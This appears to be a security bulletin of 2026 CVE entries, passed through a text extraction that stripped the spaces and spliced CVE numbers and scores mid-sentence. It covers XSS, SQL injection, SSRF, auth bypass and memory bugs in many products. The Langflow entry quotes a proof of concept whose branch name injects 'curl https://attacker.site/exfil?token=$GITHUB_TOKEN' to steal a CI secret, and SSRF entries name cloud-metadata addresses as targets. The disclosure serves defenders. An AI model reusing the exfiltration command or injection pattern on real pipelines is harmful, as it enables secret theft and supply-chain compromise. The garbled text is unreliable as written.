AwebpagethatcontainsunusualGPUshadercodeisloadedintotheGPUcompilerprocessandcantrigger awriteout-of-boundswritecrashintheGPUshadercompilerlibrary.Oncertainplatforms,whentheCVE-2026-compilerprocesshassystemprivilegesthiscouldenablefurtherexploitsonthedevice.Anedgecaseusing 9.6 MoreDetails21732averylargevalueinswitchstatementsinGPUshadercodecancauseasegmentationfaultintheGPU shadercompilerduetoanout-of-boundswriteaccess. AnchorrisaDiscordbotforrequestingmoviesandTVshowsandreceivingnotificationswhenitemsare addedtoamediaserver.Inversions1.4.1andbelow,astoredCross-siteScripting(XSS)vulnerabilityinthe webdashboard'sUserMappingdropdownallowsanyunprivilegedDiscorduserintheconfiguredguildto CVE-2026-executearbitraryJavaScriptintheAnchorradmin'sbrowser.BychainingthiswiththeGET/api/config 9.6 MoreDetails32890endpoint(whichreturnsallsecretsinplaintext),anattackercanexfiltrateeverycredentialstoredinAnchorr whichincludesDISCORDTOKEN,JELLYFINAPIKEY,JELLYSEERRAPIKEY,JWTSECRET,WEBHOOKSECRET, andbcryptpasswordhasheswithoutanyauthenticationtoAnchorritself.Thisissuehasbeenfixedin version1.4.2. mdjnelson/moodle-modcustomcertisaMoodlepluginforcreatingdynamicallygeneratedcertificateswith completecustomizationviathewebbrowser.Priortoversions4.4.9and5.0.3,ateacherwhoholds mod/customcert:manageinanysinglecoursecanreadandsilentlyoverwritecertificateelementsCVE-2026-belongingtoanyothercourseintheMoodleinstallation.Thecore_get_fragmentcallbackeditelement 9.6 MoreDetails30884andthemod_customcert_save_elementwebservicebothfailtoverifythatthesuppliedelementid belongstotheauthorizedcontext,enablingcross-courseinformationdisclosureanddatatampering. Versions4.4.9and5.0.3fixtheissue. WebSocketendpointslackproperauthenticationmechanisms,enablingattackerstoperformunauthorized stationimpersonationandmanipulatedatasenttothebackend.Anunauthenticatedattackercanconnect CVE-2026-totheOCPPWebSocketendpointusingaknownordiscoveredchargingstationidentifier,thenissueor 9.4 MoreDetails29796receiveOCPPcommandsasalegitimatecharger.Giventhatnoauthenticationisrequired,thiscanleadto privilegeescalation,unauthorizedcontrolofcharginginfrastructure,andcorruptionofchargingnetwork datareportedtothebackend. ImproperNeutralizationofArgumentDelimitersinaCommand('ArgumentInjection')vulnerabilityinCVE-2026-SalesforceMarketingCloudEngagementallowsWebServicesProtocolManipulation.Thisissueaffects 9.4 MoreDetails2298MarketingCloudEngagement:beforeJanuary30th,2026. CVE-2026-UseofhardcodedcredentialsinGoHarborHarborversion2.15.0andbelow,allowsattackerstousethe 9.4 MoreDetails4404defaultpasswordandgainaccesstothewebUI. WebSocketendpointslackproperauthenticationmechanisms,enablingattackerstoperformunauthorized stationimpersonationandmanipulatedatasenttothebackend.Anunauthenticatedattackercanconnect CVE-2026-totheOCPPWebSocketendpointusingaknownordiscoveredchargingstationidentifier,thenissueor 9.4 MoreDetails25192receiveOCPPcommandsasalegitimatecharger.Giventhatnoauthenticationisrequired,thiscanleadto privilegeescalation,unauthorizedcontrolofcharginginfrastructure,andcorruptionofchargingnetwork datareportedtothebackend. WWBNAVideoisanopensourcevideoplatform.Inversionsuptoandincluding26.0,thestandalonelive streamcontrolendpointatplugin/Live/standAloneFiles/control.json.phpacceptsauser-supplied streamerURLparameterthatoverrideswheretheserversendstokenverificationrequests.AnattackerCVE-2026-canredirecttokenverificationtoaservertheycontrolthatalwaysreturns{"error":false},completely 9.4 MoreDetails33716bypassingauthentication.Thisgrantsunauthenticatedcontroloveranylivestreamontheplatform, includingdroppingactivepublishers,starting/stoppingrecordings,andprobingstreamexistence.Commit 388fcd57dbd16f6cb3ebcdf1d08cf2b929941128containsapatch. ImproperNeutralizationofSpecialElementsusedinanSQLCommand('SQLInjection')vulnerabilityinCVE-2026-CozmoslabsProfileBuilderProallowsBlindSQLInjection.ThisissueaffectsProfileBuilderPro:fromn/a 9.3 MoreDetails27413through3.13.9. WeGIAisawebmanagerforcharitableinstitutions.Versions3.6.5andbelowcontainanauthenticatedSQL Injectionvulnerabilityinthehtml/matPat/restaurarproduto.phpendpoint.Thevulnerabilityallowsan authenticatedattackertoinjectarbitrarySQLcommandsviatheidprodutoGETparameter,leadingtofullCVE-2026-databasecompromise.Inthescript/html/matPat/restaurarproduto.php,theapplicationretrievesthe 9.3 MoreDetails33134idprodutoparameterdirectlyfromthe$GETglobalarrayandinterpolatesitdirectlyintotwoSQLquery stringswithoutanysanitization,type-casting(e.g.,(int)),orusingparameterized(prepare/execute) statements.Thisissuehasbeenfixedinversion3.6.6. WeGIAisawebmanagerforcharitableinstitutions.Versions3.6.6andbelowhaveaReflectedCross-Site Scripting(XSS)vulnerabilityinthenovomemorandoo.phpendpoint.Anattackercaninjectarbitrary JavaScriptintothesccsGETparameter,whichisdirectlyechoedintotheHTMLresponsewithoutanyCVE-2026-sanitizationorencoding.Thescript/html/memorando/novomemorandoo.phpreadsHTTPGETparameters 9.3 MoreDetails33135todisplaydynamicsuccessmessagestotheuser.Atapproximatelyline273,thecodechecksif $GET['msg']equals'success'.Iftrue,itdirectlyconcatenates$_GET['sccs']intoanHTMLalert
and outputsittothebrowser.Thisissuehasbeenfixedinversion3.6.7. SiYuanisapersonalknowledgemanagementsystem.Inversions3.6.0andbelow,SanitizeSVGhasan incompleteblocklist—itblocksdata:text/htmlanddata:image/svg+xmlinhrefattributesbutmisses data:text/xmlanddata:application/xml,bothofwhichcanrenderSVGwithJavaScriptexecution.The unauthenticated/api/icon/getDynamicIconendpointservesuser-controlledinput(viathecontentparameter)CVE-2026- 9.3 MoreDetailsdirectlyintoSVGmarkupusingfmt.Sprintfwithnoescaping,servedasContent-Type:image/svg+xml.This32940 createsaclick-throughXSS:avictimnavigatestoacraftedURL,seesanSVGwithaninjectedlink,and clickingittriggersJavaScriptviathebypassedMIMEtypes.Theattackrequiresdirectnavigationtothe endpointor / embedding,since
tagrenderinginthefrontenddoesn'tallow interactivelinks.Thisissuehasbeenfixedinversion3.6.1. WeGIAisawebmanagerforcharitableinstitutions.Versions3.6.6andbelowhaveaReflectedCross-Site Scripting(XSS)vulnerabilityinthelistarmemorandosativos.phpendpoint.Anattackercaninjectarbitrary JavaScriptorHTMLtagsintothesccdGETparameter,whichisthendirectlyechoedintotheHTMLresponseCVE-2026-withoutanysanitizationorencoding.Thescript/html/memorando/listarmemorandosativos.phphandles 9.333136dynamicsuccessmessagestousersusingquerystringparameters.Similartootherendpointsinthe Memorandomodule,itchecksif$GET['msg']equals'success'.Ifthisconditionismet,itdirectly concatenatesandreflects$GET['sccd']intoanHTMLalert.Thisissueisresolvedinversion3.6.7. FreeScoutisafreehelpdeskandsharedinboxbuiltwithPHP'sLaravelframework.Versions1.8.208and belowarevulnerabletoStoredCross-SiteScripting(XSS)throughFreeScout'semailnotificationtemplates. Incomingemailbodiesarestoredinthedatabasewithoutsanitizationandrenderedunescapedinoutgoing CVE-2026-emailnotificationsusingBlade'srawoutputsyntax{!!$thread->body!!}.Anunauthenticatedattackercan 9.3 MoreDetails32754exploitthisvulnerabilitybysimplysendinganemail,andwhenopenedbyanysubscribedagentoradminas partoftheirnormalworkflow,enablinguniversalHTMLinjection(phishing,tracking)and,invulnerableemail clients,JavaScriptexecution(sessionhijacking,credentialtheft,accounttakeover)affectingallrecipients simultaneously.Thisissuehasbeenfixedinversion1.8.209. WWBNAVideoisanopensourcevideoplatform.Inversionsuptoandincluding26.0,anunauthenticated server-siderequestforgeryvulnerabilityinplugin/Live/test.phpallowsanyremoteusertomaketheCVE-2026-AVideoserversendHTTPrequeststoarbitraryURLs.Thiscanbeusedtoprobelocalhost/internalservices 9.3 MoreDetails33502and,whenreachable,accessinternalHTTPresourcesorcloudmetadataendpoints.Commit 1e6cf03e93b5a5318204b010ea28440b0d9a5ab3containsapatch. OpenClawbefore2026.3.7containsanimproperheadervalidationvulnerabilityinfetchWithSsrFGuardthat CVE-2026-forwardscustomauthorizationheadersacrosscross-originredirects.Attackerscantriggerredirectsto 9.3 MoreDetails32913differentoriginstointerceptsensitiveheaderslikeX-Api-KeyandPrivate-Tokenintendedfortheoriginal destination. GraphitiisaframeworkthatsitsontopofmodelsandexposesthemviaaJSON:API-compliantinterface. Versionspriorto1.10.2haveanarbitrarymethodexecutionvulnerabilitythataffectsGraphiti'sJSONAPI writefunctionality.AnattackercancraftamaliciousJSONAPIpayloadwitharbitraryrelationshipnamesto invokeanypublicmethodontheunderlyingmodelinstance,classoritsassociations.Anyapplication exposingGraphitiwriteendpoints(create/update/delete)tountrustedusersisaffected.The Graphiti::Util::ValidationResponse#all_valid?methodrecursivelycallsmodel.send(name)usingCVE-2026-relationshipnamestakendirectlyfromuser-suppliedJSONAPIpayloads,withoutvalidatingthemagainstthe33286resource'sconfiguredsideloads.Thisallowsanattackertopotentiallyrunanypublicmethodonagiven modelinstance,ontheinstanceclassorassociatedinstancesorclasses,includingdestructiveoperations. ThisispatchedinGraphitiv1.10.2.Usersshouldupgradeassoonaspossible.Someworkaroundsare available.EnsureGraphitiwriteendpoints(create/update)arenotaccessibletountrustedusersand/orapply strongauthenticationandauthorizationchecksbeforeanywriteoperationisprocessed,forexampleuse Railsstrongparameterstoensureonlyvalidparametersareprocessed. TheWPDSGVOTools(GDPR)pluginforWordPressisvulnerabletounauthorizedaccountdestructioninall versionsupto,andincluding,3.1.38.Thisisduetothesuper-unsubscribeAJAXactionacceptinga process_nowparameterfromunauthenticatedusers,whichbypassestheintendedemail-confirmationflow CVE-2026-andimmediatelytriggersirreversibleaccountanonymization.Thismakesitpossibleforunauthenticated 4283attackerstopermanentlydestroyanynon-administratoruseraccount(passwordrandomized, username/emailoverwritten,rolesstripped,commentsanonymized,sensitiveusermetawiped)by submittingthevictim'semailaddresswithprocess_now=1.Thenoncerequiredfortherequestispublicly availableonanypagecontainingthe[unsubscribe_form]shortcode. CVE-2026-Out-of-boundsReadvulnerabilityinfabiangreffrathwoof.Thisissueaffectswoof:beforewoof15.3.0. 9.1 MoreDetails4750 CVE-2026-Out-of-boundsReadvulnerabilityinslajerekRetroDebugger.ThisissueaffectsRetroDebugger:before 4753 9.1v0.64.72. LangflowisatoolforbuildinganddeployingAI-poweredagentsandworkflows.Anunauthenticatedremote shellinjectionvulnerabilityexistsinmultipleGitHubActionsworkflowsintheLangflowrepositorypriorto version1.9.0.UnsanitizedinterpolationofGitHubcontextvariables(e.g.,`${{github.headref}})inrun:stepsallowsattackerstoinjectandexecutearbitraryshellcommandsviaamaliciousbranchnameorpull requesttitle.Thiscanleadtosecretexfiltration(e.g.,GITHUBTOKEN),infrastructuremanipulation,or supplychaincompromiseduringCI/CDexecution.Version1.9.0patchesthevulnerability.---###Details Severalworkflowsin.github/workflows/and.github/actions/referenceGitHubcontextvariablesdirectly inrun:shellcommands,suchas:``yamlrun:|validatebranchname"${{ github.event.pullrequest.head.ref}}"Or:yamlrun:npxplaywrightinstall${{inputs.browsers}}-- with-depsSince`github.head_ref`,`github.event.pull_request.title`,andcustom`inputs.*`maycontain **user-controlledvalues**,theymustbetreatedas**untrustedinput**.Directinterpolationwithoutproper quotingorsanitizationleadstoshellcommandinjection.---###PoC1.**Fork**theLangflowrepository2.CVE-2026-**Createanewbranch**withthename:bashinjection-test&&curlhttps://attacker.site/exfil?33475token=$GITHUB_TOKEN```3.**OpenaPullRequest**tothemainbranchfromthenewbranch4.GitHub Actionswillruntheaffectedworkflow(e.g.,deploy-docs-draft.yml)5.Therun:stepcontaining:yaml echo"Branch:${{github.head_ref}}"Willexecute:bashecho"Branch:injection-test"curl https://attacker.site/exfil?token=$GITHUB_TOKEN6.TheattackerreceivestheCIsecretviatheexfilURL. ---###Impact-Type:ShellInjection/RemoteCodeExecutioninCI-Scope:AnypublicLangflow forkwithGitHubActionsenabled-Impact:FullaccesstoCIsecrets(e.g.,GITHUB_TOKEN),possibility topushmalicioustagsorimages,tamperwithreleases,orleaksensitiveinfrastructuredata---### SuggestedFixRefactoraffectedworkflowstouseenvironmentvariablesandwrapthemindouble quotes:yamlenv:BRANCH_NAME:${{github.head_ref}}run:|echo"Branchis:\"$BRANCH_NAME\""Avoiddirect${{...}}interpolationinsiderun:foranyuser-controlledvalue.---###AffectedFiles (Langflow1.3.4)-.github/actions/install-playwright/action.yml-.github/workflows/deploy-docs- draft.yml-.github/workflows/docker-build.yml-.github/workflows/release_nightly.yml- .github/workflows/python_test.yml-.github/workflows/typescript_test.yml LoLLMsWEBUIprovidestheWebuserinterfaceforLordofLargeLanguageandMultimodalSystems.A criticalServer-SideRequestForgery(SSRF)vulnerabilityhasbeenidentifiedinallknownexistingversionsof CVE-2026-lollms-webui.The@router.post("/api/proxy")endpointallowsunauthenticatedattackerstoforcethe 33340serverintomakingarbitraryGETrequests.Thiscanbeexploitedtoaccessinternalservices,scanlocal networks,orexfiltratesensitivecloudmetadata(e.g.,AWS/GCPIAMtokens).Asoftimeofpublication,no knownpatchedversionsareavailable. CVE-2026-Incorrectboundaryconditions,uninitializedmemoryintheJavaScriptEnginecomponent.Thisvulnerability 4716affectsFirefox<149,FirefoxESR<140.9,Thunderbird<149,andThunderbird<140.9. CVE-2026-UninitializedmemoryintheGraphics:Canvas2Dcomponent.ThisvulnerabilityaffectsFirefox<149,Firefox 4715 AVideoisavideo-sharingPlatform.Versionspriorto8.0containaServer-SideRequestForgeryvulnerability (CWE-918)inthepublicthumbnailendpointsgetImage.phpandgetImageMP4.php.Bothendpointsaccepta base64UrlGETparameter,base64-decodeit,andpasstheresultingURLtoffmpegasaninputsource withoutanyauthenticationrequirement.ThepriorvalidationonlycheckedthattheURLwassyntacticallyCVE-2026-valid(FILTERVALIDATEURL)andstartedwithhttp(s)://.Thisisinsufficient:anattackercansupplyURLs33024suchashttp://169.254.169.254/latest/meta-data/(AWS/cloudinstancemetadata),http://192.168.x.x/,or http://127.0.0.1/tomaketheserverreachinternalnetworkresources.Theresponseisnotdirectlyreturned (blind),buttimingdifferencesanderrorlogscanbeusedtoinferresults.Theissuehasbeenfixedinversion 8.0. ActiveStorageallowsuserstoattachcloudandlocalfilesinRailsapplications.Priortoversions8.1.2.1, 8.0.4.1,and7.2.3.1,ActiveStorage'sDiskService#delete_prefixedpassesblobkeysdirectlytoDir.globCVE-2026-withoutescapingglobmetacharacters.Ifablobkeycontainsattacker-controlledinputorcustom-generated33202keyswithglobmetacharacters,itmaybepossibletodeleteunintendedfilesfromthestoragedirectory. Versions8.1.2.1,8.0.4.1,and7.2.3.1containapatch. Admidioisanopen-sourceusermanagementsolution.Inversions5.0.0through5.0.6,thedocumentsand filesmoduledoesnotverifywhetherthecurrentuserhaspermissiontodeletefoldersorfiles.The folderdeleteandfiledeleteactionhandlersinmodules/documents-files.phponlyperformaVIEW authorizationcheck(getFolderForDownload/getFileForDownload)beforecallingdelete(),andtheyneverCVE-2026-validateaCSRFtoken.BecausethetargetUUIDsarereadfrom$GET,deletioncanbetriggeredbyaplain32817HTTPGETrequest.Whenthemoduleisinpublicmode(documentsfilesmoduleenabled=1)andafolder ismarkedpublic(folpublic=true),anunauthenticatedattackercanpermanentlydestroytheentire documentlibrary.Evenwhenthemodulerequireslogin,anyuserwithview-onlyaccesscandeletecontent theyareonlypermittedtoread.Thisissuehasbeenfixedinversion5.0.7. AvulnerabilityinMLflow'spyfuncextractionprocessallowsforarbitraryfilewritesduetoimproperhandling oftararchiveentries.Specifically,theuseoftarfile.extractallwithoutpathvalidationenablescrafted CVE-2025-tar.gzfilescontaining..orabsolutepathstoescapetheintendedextractiondirectory.Thisissueaffects 15031thelatestversionofMLflowandposesahigh/criticalriskinscenariosinvolvingmulti-tenantenvironmentsor ingestionofuntrustedartifacts,asitcanleadtoarbitraryfileoverwritesandpotentialremotecode execution. HTSlibisalibraryforreadingandwritingbioinformaticsfileformats.CRAMisacompressedformatwhich storesDNAsequencealignmentdata.Asonemethodofremovingredundantdata,CRAMusesreference- basedcompressionsothatinsteadofstoringthefullsequenceforeachalignmentrecorditstoresalocation inanexternalreferencesequencealongwithalistofdifferencestothereferenceatthatlocationasa sequenceof"features".WhendecodingCRAMrecords,thereferencedataisstoredinachararray,and CVE-2026-partsmatchingthealignmentrecordsequencearecopiedoverasnecessary.Duetoinsufficientvalidation 31966ofthefeaturedataseries,itwaspossibletomakethe`cramdecode_seq()`functioncopydatafromeither beforethestart,oraftertheendofthestoredreferenceeitherintothebufferusedtostoretheoutput
sequenceforthecramrecord,orintothebufferusedtobuildtheSAMMDtag.Thisallowedarbitrarydata tobeleakedtothecallingfunction.Thisbugmayallowinformationaboutprogramstatetobeleaked.It mayalsocauseaprogramcrashthroughanattempttoaccessinvalidmemory.Versions1.23.1,1.22.2and 1.21.1includefixesforthisissue.Thereisnoworkaroundforthisissue. CVE-2026-UnrestrictedUploadofFilewithDangerousTypevulnerabilityinSyarifMobileAppEditorallowsUploada 27067WebShelltoaWebServer.ThisissueaffectsMobileAppEditor:fromn/athrough1.3.1. OpenEMRisafreeandopensourceelectronichealthrecordsandmedicalpracticemanagementapplication. CVE-2026-Versionspriorto8.0.0.2containaCommandinjectionvulnerabilityinthebackupfunctionalitythatcanbe 32238exploitedbyauthenticatedattackers.Thevulnerabilityexistsduetoinsufficientinputvalidationinthe backupfunctionality.Version8.0.0.2fixestheissue. CensusCSWeb8.0.1allows"app/config"tobereachableviaHTTPinsomedeployments.Aremote,CVE-2025-unauthenticatedattackercouldsendrequeststoconfigurationfilesandobtainleakedsecrets.Fixedin8.1.060949alpha. WhenapplicationsspecifyHTTPresponseheadersforservletapplicationsusingSpringSecurity,thereisthe possibilitythattheHTTPHeaderswillnotbewritten.ThisissueaffectsSpringSecurity:from5.7.0throughCVE-2026- 9.15.7.21,from5.8.0through5.8.23,from6.3.0through6.3.14,from6.4.0through6.4.14,from6.5.0through22732 6.5.8,from7.0.0through7.0.3. SuiteCRMisanopen-source,enterprise-readyCustomerRelationshipManagement(CRM)software application.ACriticalRemoteCodeExecution(RCE)vulnerabilityexistsinSuiteCRM7.15.0and8.9.2, allowingauthenticatedadministratorstoexecutearbitrarysystemcommands.Thisvulnerabilityisadirect PatchBypassofCVE-2024-49774.Althoughthevendorattemptedtofixtheissueinversion7.14.5,theCVE-2026-underlyingflawinModuleScanner.phpregardingPHPtokenparsingremains.Thescannerincorrectlyresets29103itsinternalstate($checkFunctionflag)whenencounteringanysingle-charactertoken(suchas=,.,or;). Thisallowsattackerstohidedangerousfunctioncalls(e.g.,system(),exec())usingvariableassignmentsor stringconcatenation,completelyevadingtheMLPsecuritycontrols.Versions7.15.1and8.9.3patchthe issue. Glancesisanopen-sourcesystemcross-platformmonitoringtool.Priortoversion4.5.2,inCentralBrowser mode,the/api/4/serverslistendpointreturnsrawserverobjectsfrom GlancesServersList.get_servers_list().Thoseobjectsaremutatedin-placeduringbackgroundpollingand cancontainaurifieldwithembeddedHTTPBasiccredentialsfordownstreamGlancesservers,usingtheCVE-2026-reusablepbkdf2-derivedGlancesauthenticationsecret.IfthefrontGlancesBrowser/APIinstanceisstarted32633without--password,whichissupportedandcommonforinternalnetworkdeployments,/api/4/serverslist iscompletelyunauthenticated.AnynetworkuserwhocanreachtheBrowserAPIcanretrievereusable credentialsforprotecteddownstreamGlancesserversoncetheyhavebeenpolledbythebrowserinstance.
OpenProjectisanopen-source,web-basedprojectmanagementsoftware.Versionspriorto16.6.9,17.0.6, 17.1.3,and17.2.1arevulnerabletoanSQLinjectionattackviaacustomfield'sname.Whenthatcustom fieldwasusedinaCostReport,thecustomfield'snamewasinjectedintotheSQLquerywithoutproper sanitation.ThisallowedanattackertoexecutearbitrarySQLcommandsduringthegenerationofaCost Report.Ascustomfieldscanonlybegeneratedbyuserswithfulladministratorprivileges,theattacksurface CVE-2026-issomewhatreduced.TogetherwithanotherbugintheRepositories_module,thatusedtheprojectidentifier 32698withoutsanitationtogeneratethecheckoutpathforagitrepositoryinthefilesystem,thisallowedan attackertocheckoutagitrepositorytoanarbitrarilychosenpathontheserver.Ifthecheckoutisdone withincertainpathswithintheOpenProjectapplication,uponthenextrestartoftheapplication,thisallows theattackertoinjectrubycodeintotheapplication.Astheprojectidentifiercannotbemanuallyeditedto anystringcontainingspecialcharacterslikedotsorslashes,thisneedstobechangedviatheSQLinjection describedabove.Versions16.6.9,17.0.6,17.1.3,and17.2.1fixtheissue. CVE-2026-TheWiFiExtenderWDR201A(HWV2.1,FWLFMZX28040922V1.02)exposesanunprotectedUARTinterface 30704throughaccessiblehardwarepadsonthePCB ThewebinterfaceoftheWiFiExtenderWDR201A(HWV2.1,FWLFMZX28040922V1.02)containshardcoded CVE-2026-credentialdisclosuremechanisms(intheformofServerSideInclude)withinmultipleserver-sidewebpages, 30701includinglogin.shtmlandsettings.shtml.Thesepagesembedserver-sideexecutiondirectivesthat dynamicallyretrieveandexposethewebadministrationpasswordfromnon-volatilememoryatruntime. gRPC-GoistheGolanguageimplementationofgRPC.Versionspriorto1.79.3haveanauthorizationbypass resultingfromimproperinputvalidationoftheHTTP/2:pathpseudo-header.ThegRPC-Goserverwastoo lenientinitsroutinglogic,acceptingrequestswherethe:pathomittedthemandatoryleadingslash(e.g., Service/Methodinsteadof/Service/Method).Whiletheserversuccessfullyroutedtheserequeststothe correcthandler,authorizationinterceptors(includingtheofficialgrpc/authzpackage)evaluatedtheraw, non-canonicalpathstring.Consequently,"deny"rulesdefinedusingcanonicalpaths(startingwith/)failed tomatchtheincomingrequest,allowingittobypassthepolicyifafallback"allow"rulewaspresent.This affectsgRPC-Goserversthatusepath-basedauthorizationinterceptors,suchastheofficialRBAC CVE-2026-implementationingoogle.golang.org/grpc/authzorcustominterceptorsrelyingoninfo.FullMethodor 33186grpc.Method(ctx);ANDthathaveasecuritypolicycontainsspecific"deny"rulesforcanonicalpathsbut allowsotherrequestsbydefault(afallback"allow"rule).Thevulnerabilityisexploitablebyanattackerwho
cansendrawHTTP/2frameswithmalformed:pathheadersdirectlytothegRPCserver.Thefixinversion 1.79.3ensuresthatanyrequestwitha:paththatdoesnotstartwithaleadingslashisimmediately rejectedwithacodes.Unimplementederror,preventingitfromreachingauthorizationinterceptorsor handlerswithanon-canonicalpathstring.Whileupgradingisthemostsecureandrecommendedpath, userscanmitigatethevulnerabilityusingoneofthefollowingmethods:Useavalidatinginterceptor (recommendedmitigation);infrastructure-levelnormalization;and/orpolicyhardening. ServiceinformationisnotencryptedwhentransmittedasBACnetpacketsoverthewire,andcanbesniffed, CVE-2026-intercepted,andmodifiedbyanattacker.ValuableinformationsuchastheFileStartPositionandFileData 24060canbesniffedfromnetworktrafficusingWireshark'sBACnetdissectorfilter.Theproprietaryformatusedby WebCTRLtoreceiveupdatesfromthePLCcanalsobesniffedandreverseengineered. Versionsofthepackagejsrsasignfrom7.0.0andbefore11.1.1arevulnerabletoIncompleteComparison CVE-2026-withMissingFactorsviathegetRandomBigIntegerZeroToMaxandgetRandomBigIntegerMinToMaxfunctions 4599insrc/crypto-1.1.js;anattackercanrecovertheprivatekeybyexploitingtheincorrectcompareTochecks thatacceptout-of-rangecandidatesandthusbiasDSAnoncesduringsignaturegeneration. WWBNAVideoisanopensourcevideoplatform.Priortoversion26.0,thesetPassword.json.phpendpoint intheCustomizeUserpluginallowsadministratorstosetachannelpasswordforanyuser.Duetoalogic CVE-2026-errorinhowthesubmittedpasswordvalueisprocessed,anypasswordcontainingnon-numericcharactersis 33297silentlycoercedtotheintegerzerobeforebeingstored.Thismeansthatregardlessoftheintended password,thestoredchannelpasswordbecomes0,whichanyvisitorcantriviallyguesstobypasschannel- levelaccesscontrol.Version26.0containsapatchfortheissue. WWBNAVideoisanopensourcevideoplatform.Priortoversion26.0,aServer-SideRequestForgery(SSRF) vulnerabilityexistsinplugin/Live/standAloneFiles/saveDVR.json.php.WhentheAVideoLivepluginis CVE-2026-deployedinstandalonemode(theintendedconfigurationforthisfile),the$_REQUEST['webSiteRootURL'] 33351parameterisuseddirectlytoconstructaURLthatisfetchedserver-sideviafile_get_contents().No authentication,originvalidation,orURLallowlistingisperformed.Version26.0containsapatchforthe issue. HTSlibisalibraryforreadingandwritingbioinformaticsfileformats.CRAMisacompressedformatwhich storesDNAsequencealignmentdata.Inthecram_decode_slice()functioncalledwhilereadingCRAM records,thevalueofthematereferenceidfieldwasnotvalidated.Lateruseofthisvalue,forexamplewhen convertingthedatatoSAMformat,couldresultintheoutofboundsarrayreadswhenlookinguptheCVE-2026-correspondingreferencename.Ifthearrayvalueobtainedalsohappenedtobeavalidpointer,itwouldbe31967interpretedasastringandanattemptwouldbemadetowritethedataaspartoftheSAMrecord.Thisbug mayallowinformationaboutprogramstatetobeleaked.Itmayalsocauseaprogramcrashthroughan attempttoaccessinvalidmemory.Versions1.23.1,1.22.2and1.21.1includefixesforthisissue.Thereisno workaroundforthisissue. SiYuanisapersonalknowledgemanagementsystem.Inversions3.6.0andbelow,themobilefiletree (MobileFiles.ts)rendersnotebooknamesviainnerHTMLwithoutHTMLescapingwhenprocessing renamenotebookWebSocketevents.Thedesktopversion(Files.ts)properlyusesescapeHtml()forthesame operation.AnauthenticateduserwhocanrenamenotebookscaninjectarbitraryHTML/JavaScriptthatCVE-2026- 9.0executesonanymobileclientviewingthefiletree.SinceElectronisconfiguredwithnodeIntegration:true32751 andcontextIsolation:false,theinjectedJavaScripthasfullNode.jsaccess,escalatingstoredXSStofull remotecodeexecution.ThemobilelayoutisalsousedintheElectrondesktopappwhenthewindowis narrow,makingthisexploitableondesktopaswell.Thisissuehasbeenfixedinversion3.6.1.
OpenProjectisanopen-source,web-basedprojectmanagementsoftware.Inversionspriorto16.6.9,17.0.6, 17.1.3,and17.2.1,theRepositoriesmoduledidnotproperlyescapefilenamesdisplayedfromrepositories. CVE-2026-Thisallowedanattackerwithpushaccessintotherepositorytocreatecommitswithfilenamesthatincluded 9.0 MoreDetails32703HTMLcodethatwasinjectedinthepagewithoutpropersanitation.ThisallowedapersistedXSSattack againstallmembersofthisprojectthataccessedtherepositoriespagetodisplayachangesetwherethe maliciouslycraftedfilewasdeleted.Versions16.6.9,17.0.6,17.1.3,and17.2.1fixtheissue. UnrestrictedUploadofFilewithDangerousTypevulnerabilityinRymeraWebCoPtyLtd.WoocommerceCVE-2026-WholesaleLeadCaptureallowsUsingMaliciousFiles.ThisissueaffectsWoocommerceWholesaleLead 9.0 MoreDetails27540Capture:fromn/athrough2.0.3.1. AnchorrisaDiscordbotforrequestingmoviesandTVshowsandreceivingnotificationswhenitemsare addedtoamediaserver.Versions1.4.1andbelowcontainastoredXSSvulnerabilityintheJellyseerruser selector.JellyseerrallowsanyaccountholdertoexecutearbitraryJavaScriptintheAnchorradmin'sbrowser session.Theinjectedscriptcallstheauthenticated/api/configendpoint-whichreturnsthefullapplicationCVE-2026-configurationinplaintext.ThisallowstheattackertoforgeavalidAnchorrsessiontokenandgainfulladmin 9.0 MoreDetails32891accesstothedashboardwithnoknowledgeoftheadminpassword.Thesameresponsealsoexposesthe APIkeysandtokensforeveryintegratedservice,resultinginsimultaneousaccounttakeoveroftheJellyfin mediaserver(viaJELLYFINAPIKEY),theJellyseerrrequestmanager(viaJELLYSEERRAPIKEY),andthe Discordbot(viaDISCORD_TOKEN).Thisissuehasbeenfixedinversion1.4.2. SiYuanisapersonalknowledgemanagementsystem.Inversions3.6.0andbelow,thebackend renderREADMEfunctionuseslute.New()withoutcallingSetSanitize(true),allowingrawHTMLembeddedin
Markdowntopassthroughunmodified.ThefrontendthenassignstherenderedHTMLtoinnerHTMLwithoutCVE-2026- 9.0 MoreDetails 33066anyadditionalsanitization.AmaliciouspackageauthorcanembedarbitraryJavaScriptintheirREADMEthat executeswhenauserclickstoviewthepackagedetails.BecauseSiYuan'sElectronconfigurationenables nodeIntegration:truewithcontextIsolation:false,thisXSSescalatesdirectlytofullRemoteCodeExecution. Theissuewaspatchedinversion3.6.1. SiYuanisapersonalknowledgemanagementsystem.Versions3.6.0andbelowrenderpackagemetadata fields(displayName,description)usingtemplateliteralswithoutHTMLescaping.Amaliciouspackageauthor caninjectarbitraryHTML/JavaScriptintothesefields,whichexecutesautomaticallywhenanyuserbrowsesCVE-2026-theBazaarpage.BecauseSiYuan'sElectronconfigurationenablesnodeIntegration:truewith 9.0 MoreDetails33067contextIsolation:false,thisXSSescalatesdirectlytofullRemoteCodeExecutiononthevictim'soperating system—withzerouserinteractionbeyondopeningthemarketplacetab.Thisissuehasbeenfixedin version3.6.1. NVIDIAAPEXforLinuxcontainsavulnerabilitywhereanunauthorizedattackercouldcauseadeserialization CVE-2025-ofuntrusteddata.ThisvulnerabilityaffectsenvironmentsthatusePyTorchversionsearlierthan2.6.A 9.0 MoreDetails33244successfulexploitofthisvulnerabilitymightleadtocodeexecution,denialofservice,escalationof privileges,datatampering,andinformationdisclosure.
OTHERVULNERABILITIES
CVE Base Description ReferenceNumber Score
CVE- AvulnerabilitywasdeterminedinUTTHiPER1200GWupto2.5.3-170306.Thisimpactsthefunctionstrcpyofthe More2026- file/goform/websHostFilter.Thismanipulationcausesbufferoverflow.Itispossibletoinitiatetheattackremotely. 8.8 Details4487 Theexploithasbeenpubliclydisclosedandmaybeutilized. CVE- OutofboundsreadandwriteinWebAudioinGoogleChromepriorto146.0.7680.153allowedaremoteattacker More2026- 8.8 topotentiallyexploitheapcorruptionviaacraftedHTMLpage.(Chromiumsecurityseverity:High) Details4459 Asecurityissuewasdiscoverediningress-nginxwhereacombinationofIngressannotationscanbeusedtoinjectCVE- configurationintonginx.Thiscanleadtoarbitrarycodeexecutioninthecontextoftheingress-nginxcontroller, More2026- 8.8 anddisclosureofSecretsaccessibletothecontroller.(Notethatinthedefaultinstallation,thecontrollercan Details4342 accessallSecretscluster-wide.) CVE- TypeConfusioninV8inGoogleChromepriorto146.0.7680.153allowedaremoteattackertopotentiallyexploit 